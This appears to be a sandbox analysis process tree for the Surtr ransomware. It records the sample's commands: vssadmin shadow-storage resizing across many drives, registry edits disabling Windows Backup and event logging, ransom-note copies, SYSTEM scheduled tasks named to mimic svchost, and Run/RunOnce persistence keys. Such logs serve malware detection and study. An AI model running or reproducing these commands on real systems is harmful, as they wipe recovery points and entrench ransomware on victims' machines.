                                                                                                                                                        PID:3260
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1132
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5328
                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                              vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
                                                                                                                                                              3⤵
                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                              PID:2840
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                            2⤵
                                                                                                                                                              PID:5452
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6160
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5648
                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                    PID:6292
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5684
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:6284
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5620
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6224
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:5732
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:5716
                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:6236
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5704
                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                  vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                  PID:6208
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:5408
                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                    vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                    PID:1664
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5372
                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                      vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                      PID:6152
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5352
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4104
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5296
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2736
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5172
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:6048
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5164
                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                    PID:5088
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:1448
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3864
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4548
                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                          vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                          PID:2004
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:3176
                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                            vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                            PID:4596
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5884
                                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                              vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                              PID:6244
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:5988
                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                PID:6424
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:6052
                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                  vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                  PID:6660
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:6028
                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                    PID:6676
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5972
                                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                      vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                      PID:6720
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:5952
                                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                        vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                        PID:6492
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:5892
                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                          vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                          PID:6368
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:6140
                                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                            vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                            PID:6712
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3244
                                                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                              vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                                              PID:6668
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:3756
                                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                PID:6760
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:1136
                                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                  vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                                  PID:6516
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3036
                                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                    vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                    PID:6544
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:5396
                                                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                      vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                                      PID:6376
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:4344
                                                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                        vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                                        PID:6480
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:4776
                                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                          vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                                          PID:6596
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:6076
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:6200
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_t0pq1466jbkptx.surt" "%TEMP%\Service\PublicData_t0pq1466jbkptx.surt"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:6748
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_t0pq1466jbkptx.surt" "%TEMP%\Service\PrivateData_t0pq1466jbkptx.surt"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:6928
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:6948
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:6968
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:6988
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:7012
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                          attrib +R /S "C:\ProgramData\Service"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                          PID:7028
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:7124
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                            attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                            PID:7140
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:7156
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                              schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                              PID:1620
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:2644
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                PID:3988
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                                                                                              PID:3864
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:4748
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                  PID:4064
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:3344
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                    PID:3252
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:3616
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                                      PID:380
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:5916
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                                        PID:1144
                                                                                                                                                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                    PID:3712
                                                                                                                                                                                                                                                                  • C:\Windows\system32\wbengine.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                    PID:4692
                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                    PID:4880
                                                                                                                                                                                                                                                                  • C:\Windows\System32\vdsldr.exe
                                                                                                                                                                                                                                                                    C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:5276
                                                                                                                                                                                                                                                                    • C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\vds.exe
